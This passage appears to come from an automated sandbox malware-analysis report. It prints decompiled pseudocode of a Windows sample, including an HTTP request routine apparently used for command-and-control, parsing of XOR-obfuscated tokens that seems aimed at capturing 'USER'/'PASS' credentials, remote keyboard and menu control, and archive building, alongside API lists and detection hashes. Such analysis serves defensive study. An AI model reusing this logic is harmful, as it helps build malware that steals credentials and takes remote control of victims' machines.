									__eflags = _t112;
									if(_t112 != 0) {
										_v5 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

0x0040809e
0x0040809e
0x004080b2
0x004080b7
0x004080bd
0x004080c3
0x004080d6
0x004080df
0x004080e5
0x004080e8
0x004080ea
0x00000000
0x00000000
0x004080f7
0x00408109
0x0040810f
0x00408112
0x00408114
0x00000000
0x00000000
0x00408121
0x0040812c
0x00408132
0x00408135
0x00408137
0x00000000
0x00000000
0x00408144
0x00408157
0x0040815d
0x0040815f
0x00408161
0x00000000
0x00000000
0x0040816d
0x00408173
0x00408175
0x00000000
0x00000000
0x0040817b
0x00408184
0x00408187
0x0040818a
0x00408190
0x00408193
0x00408195
0x00408300
0x00000000
0x00408300
0x004081a4
0x004081a7
0x004081b1
0x004081b4
0x004081b6
0x004081b6
0x004081c4
0x004081c9
0x004081cb
0x004081e2
0x004081e2
0x004081cd
0x004081d0
0x004081db
0x004081db
0x004081e7
0x004081eb
0x004081f1
0x004081f4
0x004081fa
0x00408201
0x00408205
0x0040820b
0x0040820b
0x0040820f
0x00408212
0x00408214
0x00408219
0x00408219
0x00408219
0x0040821d
0x00408220
0x00408225
0x00408229
0x0040822d
0x00000000
0x00000000
0x00408239
0x0040823c
0x00408248
0x00408254
0x00408258
0x00408263
0x00408272
0x00408276
0x00408286
0x00408295
0x0040829b
0x004082a1
0x004082a3
0x00000000
0x00000000
0x004082aa
0x004082b0
0x004082b3
0x004082b5
0x004082b8
0x004082be
0x004082c4
0x004082c6
0x004082cf
0x004082d1
0x004082d7
0x004082d9
0x004082dc
0x004082e2
0x004082e8
0x004082ee
0x004082f0
0x004082f2
0x004082f2
0x004082f0
0x004082d9
0x004082fa
0x004082fa
0x004082b5
0x00000000
0x004081f4
0x004080c5
0x00000000

APIs

TlsAlloc.KERNEL32(00422E10,00000000,0000018C,00000000,00000000), ref: 004080B7
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 004080DF
CreateEventW.KERNEL32(00422978,00000001,00000000,?,84889912,?,00000001), ref: 00408109
CreateMutexW.KERNEL32(00422978,00000000,?,18782822,?,00000001), ref: 0040812C
CreateFileMappingW.KERNEL32(00000000,00422978,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 00408157
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040816D
GetDC.USER32(00000000), ref: 0040818A
GetDeviceCaps.GDI32(00000000,00000008), ref: 004081AA
GetDeviceCaps.GDI32(?,0000000A), ref: 004081B4
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 004081C7

Strings

x)B, xrefs: 00408103

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
String ID: x)B
API String ID: 3765073151-2033672109
Opcode ID: 1f308d8783beb4ac953aa6ade088183827677b61a3b0b26ade5ddab32361e433
Instruction ID: 189b5de288d8e877e26bb0b8cae87b3110a72e1e4a9bfa3d6f60ad39a81ca0ce
Opcode Fuzzy Hash: 1f308d8783beb4ac953aa6ade088183827677b61a3b0b26ade5ddab32361e433
Instruction Fuzzy Hash: 767133B5900744AFD7209FB0CD89EEB7BACEB44304F10487EF592E3691D67999858F14

Uniqueness

Uniqueness Score: -1.00%

Function 00415CD2, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00415CD2(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t35;
				void* _t40;
				char* _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				signed int* _t71;
				intOrPtr _t73;
				signed int _t75;
				signed char _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t85;
				void* _t87;
				char* _t92;
				void* _t93;
				intOrPtr* _t94;

				_t80 = __edx;
				_t87 = __eax;
				_t71 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t35 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t87 - 1;
						if(_t87 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x42311c);
							_t83 = E00415BCA(_a4);
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags =  *((intOrPtr*)(_t83 + 4));
								if( *((intOrPtr*)(_t83 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t83 + 8));
									if( *((intOrPtr*)(_t83 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t87 - 3;
										if(_t87 < 3) {
											L33:
											__eflags = _t87 - 4;
											if(_t87 >= 4) {
												_t75 =  *_t71 ^ 0x01050809;
												__eflags = _t75 - 0x4455515d;
												if(_t75 == 0x4455515d) {
													goto L37;
												} else {
													__eflags = _t75 - 0x55444d4f;
													if(_t75 == 0x55444d4f) {
														goto L37;
													} else {
														__eflags = _t75 - 0x57564959;
														if(_t75 != 0x57564959) {
															__eflags = _t75 - 0x55445c5a;
															if(_t75 == 0x55445c5a) {
																L40:
																_t76 = 0x65;
																_push(0x15);
																goto L41;
															} else {
																__eflags = _t75 - 0x55564145;
																if(_t75 == 0x55564145) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t58 =  *_t71;
											__eflags = _t58 - 0x43;
											if(_t58 == 0x43) {
												L31:
												__eflags = _t71[0] - 0x57;
												if(_t71[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t71[0] - 0x44;
													if(_t71[0] == 0x44) {
														L37:
														_t76 = 0x64;
														_push(0x14);
														L41:
														_pop(_t40);
														E004159A4(_t40,  &_v696);
														_t43 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t43,  &_v700);
														__eflags = _t43;
														if(_t43 == 0) {
															_t78 =  &_v664;
															_t44 = E004198CB( &_v664);
															__eflags = _t44;
															if(_t44 == 0) {
																__eflags = _t76 - 0x65;
																if(_t76 == 0x65) {
																	L46:
																	E00419882( &_v664, _t78,  &_v536);
																	_t47 = 0x13;
																	E004159A4(_t47,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t83 + 8)));
																	_push( *((intOrPtr*)(_t83 + 4)));
																	E00405851(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t76 - 0x64;
																	if(_t76 == 0x64) {
																		_t92 =  &_v696;
																		_t54 = 0x16;
																		E004159A4(_t54, _t92);
																		_push( *((intOrPtr*)(_t83 + 4)));
																		_t80 = _t80 | 0xffffffff;
																		_t56 = 9;
																		_t78 = _t92;
																		_t57 = E00417031(_t56, _t92, _t80);
																		__eflags = _t57;
																		if(_t57 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E00415C69(_t83);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t58 - 0x50;
												if(_t58 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t73 = 0;
							goto L23;
						}
					} else {
						_t60 =  *__ecx ^ 0x01050809;
						if(_t60 == 0x53405b5c || _t60 == 0x52564959) {
							if(_t71[1] != 0x20) {
								goto L24;
							} else {
								_t61 = 0;
								_t93 = _t87 + 0xfffffffb;
								_t84 =  &(_t71[1]);
								if(_t93 == 0) {
									goto L51;
								} else {
									while(1) {
										_t79 =  *((intOrPtr*)(_t61 + _t84));
										if(_t79 == 0xd || _t79 == 0xa) {
											break;
										}
										if(_t79 < 0x20) {
											goto L51;
										} else {
											_t61 = _t61 + 1;
											if(_t61 < _t93) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t61 == 0 || _t61 == _t93) {
										goto L51;
									} else {
										_t85 = E00416661(_t61, 0xfde9, _t84);
										if(_t85 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x42311c);
											_t94 = E00415BCA(_a4);
											if(_t94 != 0) {
												L18:
												__eflags =  *_t71 - 0x55;
												_v701 = 1;
												if( *_t71 != 0x55) {
													E00416421( *((intOrPtr*)(_t94 + 8)));
													 *((intOrPtr*)(_t94 + 8)) = _t85;
												} else {
													E00415C69(_t94, 1);
													 *((intOrPtr*)(_t94 + 4)) = _t85;
												}
												 *_t94 = _a4;
											} else {
												_t94 = E00415C03(_a4);
												if(_t94 != 0) {
													goto L18;
												} else {
													E00416421(_t85);
												}
											}
											_t73 = _v701;
											L23:
											LeaveCriticalSection(0x42311c);
											_t35 = _t73;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t35;
			}

0x00415cd2
0x00415ce5
0x00415ce7
0x00415ce9
0x00415f40
0x00415f40
0x00415f40
0x00415d03
0x00415d06
0x00415def
0x00415def
0x00415df2
0x00000000
0x00415df8
0x00415dfd
0x00415e0b
0x00415e0f
0x00415e11
0x00415e17
0x00415e1a
0x00415f31
0x00415f31
0x00000000
0x00415e20
0x00415e20
0x00415e23
0x00000000
0x00415e29
0x00415e29
0x00415e2c
0x00415e44
0x00415e44
0x00415e47
0x00415e4f
0x00415e55
0x00415e5b
0x00000000
0x00415e5d
0x00415e5d
0x00415e63
0x00000000
0x00415e65
0x00415e65
0x00415e6b
0x00415e73
0x00415e79
0x00415e87
0x00415e87
0x00415e89
0x00000000
0x00415e7b
0x00415e7b
0x00415e81
0x00000000
0x00000000
0x00415e81
0x00000000
0x00000000
0x00000000
0x00415e6b
0x00415e63
0x00415e5b
0x00415e2e
0x00415e2e
0x00415e30
0x00415e32
0x00415e38
0x00415e38
0x00415e3c
0x00000000
0x00415e3e
0x00415e3e
0x00415e42
0x00415e6d
0x00415e6d
0x00415e6f
0x00415e8b
0x00415e8f
0x00415e90
0x00415e9a
0x00415ea2
0x00415eaa
0x00415eb0
0x00415eb2
0x00415eb4
0x00415eb8
0x00415ebd
0x00415ebf
0x00415ec1
0x00415ec4
0x00415eeb
0x00415ef6
0x00415f01
0x00415f02
0x00415f0e
0x00415f0f
0x00415f16
0x00415f25
0x00415ec6
0x00415ec6
0x00415ec9
0x00415ecd
0x00415ed1
0x00415ed2
0x00415ed7
0x00415eda
0x00415edf
0x00415ee0
0x00415ee2
0x00415ee7
0x00415ee9
0x00000000
0x00000000
0x00415ee9
0x00415ec9
0x00415ec4
0x00415ebf
0x00415f2d
0x00415f32
0x00415f34
0x00000000
0x00000000
0x00000000
0x00415e42
0x00415e34
0x00415e34
0x00415e36
0x00000000
0x00000000
0x00000000
0x00000000
0x00415e36
0x00415e32
0x00415e2c
0x00415e23
0x00415e1a
0x00415f39
0x00000000
0x00415f39
0x00415d0c
0x00415d0e
0x00415d18
0x00415d29
0x00000000
0x00415d2f
0x00415d2f
0x00415d31
0x00415d34
0x00415d37
0x00000000
0x00415d3d
0x00415d3d
0x00415d3d
0x00415d43
0x00000000
0x00000000
0x00415d4d
0x00000000
0x00415d53
0x00415d53
0x00415d56
0x00000000
0x00000000
0x00000000
0x00000000
0x00415d56
0x00000000
0x00415d4d
0x00415d5a
0x00000000
0x00415d68
0x00415d73
0x00415d77
0x00000000
0x00415d7d
0x00415d82
0x00415d87
0x00415d95
0x00415d99
0x00415db1
0x00415db1
0x00415db4
0x00415db9
0x00415dcc
0x00415dd1
0x00415dbb
0x00415dbf
0x00415dc4
0x00415dc4
0x00415dd7
0x00415d9b
0x00415da3
0x00415da7
0x00000000
0x00415da9
0x00415daa
0x00415daa
0x00415da7
0x00415dd9
0x00415ddd
0x00415de2
0x00415de8
0x00415de8
0x00415d77
0x00415d5a
0x00415d37
0x00000000
0x00000000
0x00000000
0x00415d18
0x00415d06
0x00415f42
0x00415f48

APIs

EnterCriticalSection.KERNEL32(0042311C,0000FDE9,?), ref: 00415D87
LeaveCriticalSection.KERNEL32(0042311C,?,000000FF), ref: 00415DE2
EnterCriticalSection.KERNEL32(0042311C), ref: 00415DFD
getpeername.WS2_32 ref: 00415EAA

Strings

D, xrefs: 00415E3E
EAVU, xrefs: 00415E7B
\[@S, xrefs: 00415D13
YIVR, xrefs: 00415D1A
U, xrefs: 00415DB1
YIVW, xrefs: 00415E65
Z\DU, xrefs: 00415E73
W, xrefs: 00415E38
]QUD, xrefs: 00415E55
, xrefs: 00415D25
OMDU, xrefs: 00415E5D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Leavegetpeername
String ID: $D$EAVU$OMDU$U$W$YIVR$YIVW$Z\DU$\[@S$]QUD
API String ID: 1099368488-2757721025
Opcode ID: bc9698637f868cacf6305389799c49b8fde871cd359eb66c6067c0a333cc5113
Instruction ID: 3e779d46858ab7630386f9c3506d5d6fd4c19a07baab98d9a46c60c182e299ce
Opcode Fuzzy Hash: bc9698637f868cacf6305389799c49b8fde871cd359eb66c6067c0a333cc5113
Instruction Fuzzy Hash: EF518631A04B01DADF309B65DC89BEB77A49BC1300F58852BF9949B291D72DDDC2878E

Uniqueness

Uniqueness Score: -1.00%

Function 00410AA2, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410AA2(void _a4) {
				long _v12;
				void* _v16;
				void* _v20;
				char _v22;
				short _v24;
				char* _v32;
				char* _v36;
				intOrPtr _v40;
				void* _v44;
				char _v56;
				char _v64;
				char _v548;
				char _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t94;
				void* _t97;
				char* _t99;
				intOrPtr* _t106;
				void* _t109;
				intOrPtr* _t110;
				void* _t114;

				_t106 = _a4;
				if(E0041AE88( &_v36,  *((intOrPtr*)(_t106 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x422bb4, 0, 0, 0, 0);
				_v44 = _t53;
				if(_t53 == 0) {
					L24:
					E00416421(_v36);
					E00416421(_v32);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v36, _v24, 0, 0, 3, 0, 0);
				_v20 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v44);
					goto L24;
				}
				_t58 =  *_t106;
				_t99 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t99 = "GET";
				}
				_t97 = HttpOpenRequestA(_v20, _t99, _v32, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v22 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v16 = _t97;
				if(_t97 == 0) {
					L22:
					InternetCloseHandle(_v20);
					goto L23;
				} else {
					E00406A66(_t99,  &_v552);
					_t63 = 0xe;
					E0041596E(_t63,  &_v64);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t94 = E004171E5( &_v12,  &_v64,  *((intOrPtr*)(_t66 + 0x1c)));
						_t114 = _t114 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
							E00416421(_v12);
						}
					}
					_t67 = 0xf;
					E0041596E(_t67,  &_v56);
					_v40 = E00416F70( &_v548);
					_t109 = E004163F1(2 + _t69 * 6);
					if(_t109 == 0) {
						_t109 = 0;
					} else {
						E0041B1B3(_t109,  &_v548, _v40);
						_t97 = _v16;
					}
					if(_t109 != 0 && E004171E5( &_v12,  &_v56, _t109) > 0) {
						HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
						E00416421(_v12);
					}
					E00416421(_t109);
					_t110 = _a4;
					if(HttpSendRequestA(_t97, 0, 0,  *( *_t110 + 0x24),  *( *_t110 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t97);
						goto L22;
					} else {
						_v12 = 4;
						_a4 = 0;
						if(HttpQueryInfoA(_t97, 0x20000013,  &_a4,  &_v12, 0) != 1 || _a4 != 0xc8) {
							goto L21;
						} else {
							if(E00418557( &_v12, _t97) != 0) {
								E00416421(_t80);
							}
							E00416421(_v36);
							E00416421(_v32);
							 *(_t110 + 8) = _v16;
							goto L25;
						}
					}
				}
			}

0x00410aae
0x00410abe
0x00410cb2
0x00410cb6
0x00410cb6
0x00410ad0
0x00410ad6
0x00410adb
0x00410ca0
0x00410ca3
0x00410cab
0x00000000
0x00410cab
0x00410aee
0x00410af4
0x00410af9
0x00410c97
0x00410c9a
0x00000000
0x00410c9a
0x00410aff
0x00410b05
0x00410b0a
0x00410b0c
0x00410b0c
0x00410b3f
0x00410b41
0x00410b46
0x00410c8e
0x00410c91
0x00000000
0x00410b4c
0x00410b53
0x00410b5d
0x00410b5e
0x00410b66
0x00410b6b
0x00410b77
0x00410b7c
0x00410b81
0x00410b8e
0x00410b97
0x00410b97
0x00410b81
0x00410ba1
0x00410ba2
0x00410bb2
0x00410bc0
0x00410bc4
0x00410bdc
0x00410bc6
0x00410bd2
0x00410bd7
0x00410bd7
0x00410be0
0x00410c02
0x00410c0b
0x00410c0b
0x00410c11
0x00410c16
0x00410c2d
0x00410c87
0x00410c88
0x00000000
0x00410c2f
0x00410c3e
0x00410c45
0x00410c51
0x00000000
0x00410c5c
0x00410c67
0x00410c6a
0x00410c6a
0x00410c72
0x00410c7a
0x00410c82
0x00000000
0x00410c82
0x00410c51
0x00410c2d

APIs

Part of subcall function 0041AE88: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041AEB7

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00410AD0
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00410AEE
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00410B39
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00410B8E
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00410C02
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00410C24
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00410C48
InternetCloseHandle.WININET(00000000), ref: 00410C88
InternetCloseHandle.WININET(?), ref: 00410C91

Part of subcall function 00418557: InternetQueryOptionA.WININET(00000000,00000022,00000000,000000C8), ref: 0041856B
Part of subcall function 00418557: GetLastError.KERNEL32 ref: 00418575
Part of subcall function 00418557: InternetQueryOptionA.WININET(00000022,00000022,00000000,000000C8), ref: 00418595

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

InternetCloseHandle.WININET(?), ref: 00410C9A

Strings

GET, xrefs: 00410B0C, 00410B35
HTTP/1.1, xrefs: 00410B2D
POST, xrefs: 00410B05

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 1023423486-2753618334
Opcode ID: c3a44f2bd41abdf7957fd963af438e166376243de1ac0fb888dd73f4b4fe6709
Instruction ID: 56f4a7594f05062c74257cdb3d4c000736c1aad2af0673c4e16343e0d725322a
Opcode Fuzzy Hash: c3a44f2bd41abdf7957fd963af438e166376243de1ac0fb888dd73f4b4fe6709
Instruction Fuzzy Hash: AD51BE72900118BBCB11ABE1DD88EDFBF79EF48354F104526F505B6261DB789AC0CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004085D0, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004085D0(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t70;
				struct HMENU__* _t74;
				void* _t78;

				_t65 = __ecx;
				_t37 = _a8;
				_t78 = _t37 - 0xfffffffd;
				if(_t78 == 0) {
					SetKeyboardState( *0x422e20);
					L23:
					SetEvent( *0x422e1c);
					return 0;
				}
				if(_t78 <= 0 || _t37 > 0xffffffff) {
					_v20.top = _t37 >> 0x10;
					_v20.right = _t65 & 0x0000ffff;
					_v20.left = _t37 & 0x0000ffff;
					_v20.bottom = _t65 >> 0x10;
					E00408D10( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x422e10, _a4, 0);
					goto L23;
				} else {
					_t70 = GetMenu(_a4);
					if(_t70 == 0) {
						goto L23;
					}
					_v24 = _v24 | 0xffffffff;
					_t46 = GetMenuItemCount(_t70);
					_t63 = 0;
					_v28 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x422e20; // 0x0
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v28 = GetMenuState(_t70, _t64, 0x400);
						if(_v24 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t70, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
							if((_v28 & 0x00000010) == 0) {
								if((_v28 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t70, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t74 = GetSubMenu(_t70, _t64);
							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t70, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t70, _t63, 0x400);
							_v24 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v28);
					goto L8;
				}
			}

0x004085d0
0x004085d6
0x004085df
0x004085e2
0x00408761
0x00408767
0x0040876d
0x0040877b
0x0040877b
0x004085e8
0x00408730
0x0040873c
0x0040874c
0x00408750
0x00408754
0x00000000
0x004085f7
0x00408600
0x00408604
0x00000000
0x00000000
0x0040860a
0x00408610
0x00408616
0x00408618
0x00408623
0x00408649
0x00408649
0x0040864e
0x00408664
0x00408669
0x00000000
0x00000000
0x00408678
0x00408680
0x00408682
0x00408682
0x00408692
0x0040869c
0x004086b2
0x00408701
0x00408709
0x00408712
0x00000000
0x00000000
0x00408714
0x00408722
0x00000000
0x00408722
0x00408703
0x00000000
0x00408703
0x004086bc
0x004086c0
0x004086f1
0x004086f1
0x004086c0
0x00000000
0x00000000
0x00000000
0x00000000
0x00408625
0x00408625
0x00408630
0x00408638
0x0040863e
0x0040863e
0x00408642
0x00408643
0x00000000
0x00408625

APIs

GetMenu.USER32(?), ref: 004085FA
GetMenuItemCount.USER32 ref: 00408610
GetMenuState.USER32 ref: 00408628
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00408638
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040865E
GetMenuState.USER32 ref: 00408672
EndMenu.USER32 ref: 00408682
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 00408692
GetSubMenu.USER32 ref: 004086B6
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 004086D0
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 004086F1
GetMenuItemID.USER32(00000000,00000000), ref: 00408709
SendMessageW.USER32(?,00000111,?,00000000), ref: 00408722
SetKeyboardState.USER32 ref: 00408761
SetEvent.KERNEL32 ref: 0040876D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: 707f75d54bbdf3340546d2ae6d4daf8c2f15fa1b4137511ece2da975adacd6fb
Instruction ID: ddeb767616201afbae5c4c784a57c97ce6aae36d9336bdc6a85f1ce15c58a412
Opcode Fuzzy Hash: 707f75d54bbdf3340546d2ae6d4daf8c2f15fa1b4137511ece2da975adacd6fb
Instruction Fuzzy Hash: A841AF30104305AFD715AF34DF48ABB3AA8EB847A8F14073DF995B21F0CB7589519B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041A107, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A107() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;

				if( *0x423f44 != 0) {
					L9:
					 *0x423f44 =  *0x423f44 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x423f40 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x42356c = GetProcAddress(_t2, "FCICreate");
						 *0x423f30 = GetProcAddress( *0x423f40, "FCIAddFile");
						 *0x423164 = GetProcAddress( *0x423f40, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x423f40, "FCIDestroy");
						 *0x423f38 = _t7;
						if( *0x42356c == 0 ||  *0x423f30 == 0 ||  *0x423164 == 0 || _t7 == 0) {
							L7:
							FreeLibrary( *0x423f40);
							goto L8;
						} else {
							_t9 = HeapCreate(0, 0x80000, 0);
							 *0x423160 = _t9;
							if(_t9 != 0) {
								goto L9;
							} else {
								goto L7;
							}
						}
					}
				}
			}

0x0041a110
0x0041a1bb
0x0041a1bb
0x0041a1c4
0x0041a116
0x0041a11b
0x0041a121
0x0041a128
0x0041a1b7
0x0041a1ba
0x0041a12e
0x0041a148
0x0041a15a
0x0041a16c
0x0041a171
0x0041a173
0x0041a17f
0x0041a1ab
0x0041a1b1
0x00000000
0x0041a195
0x0041a19c
0x0041a1a2
0x0041a1a9
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a1a9
0x0041a17f
0x0041a128

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041A1EE,?,0041A40A,?,?,00000000,?), ref: 0041A11B
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0041A13B
GetProcAddress.KERNEL32(FCIAddFile), ref: 0041A14D
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0041A15F
GetProcAddress.KERNEL32(FCIDestroy), ref: 0041A171
HeapCreate.KERNEL32(00000000,00080000,00000000,0041A40A,?,?,00000000,?), ref: 0041A19C
FreeLibrary.KERNEL32(0041A40A,?,?,00000000,?), ref: 0041A1B1

Strings

FCICreate, xrefs: 0041A135
FCIDestroy, xrefs: 0041A161
cabinet.dll, xrefs: 0041A116
FCIFlushCabinet, xrefs: 0041A14F
FCIAddFile, xrefs: 0041A13D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: facbaf7b395050960ac34012fb333e202eaed65f27b7e705bc215cd285f42f6e
Instruction ID: be1545600d9a8d341680e3daedeb59b4756e1285aa2b27f332d277b0d9637646
Opcode Fuzzy Hash: facbaf7b395050960ac34012fb333e202eaed65f27b7e705bc215cd285f42f6e
Instruction Fuzzy Hash: E1118270F01240AAC7319F64BE44A5ABFB0B7C8B023550577E604A2274D73C4592CE0D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D33C, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040D33C(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v44;
				void* _v60;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v92;
				void* _v96;
				intOrPtr _v104;
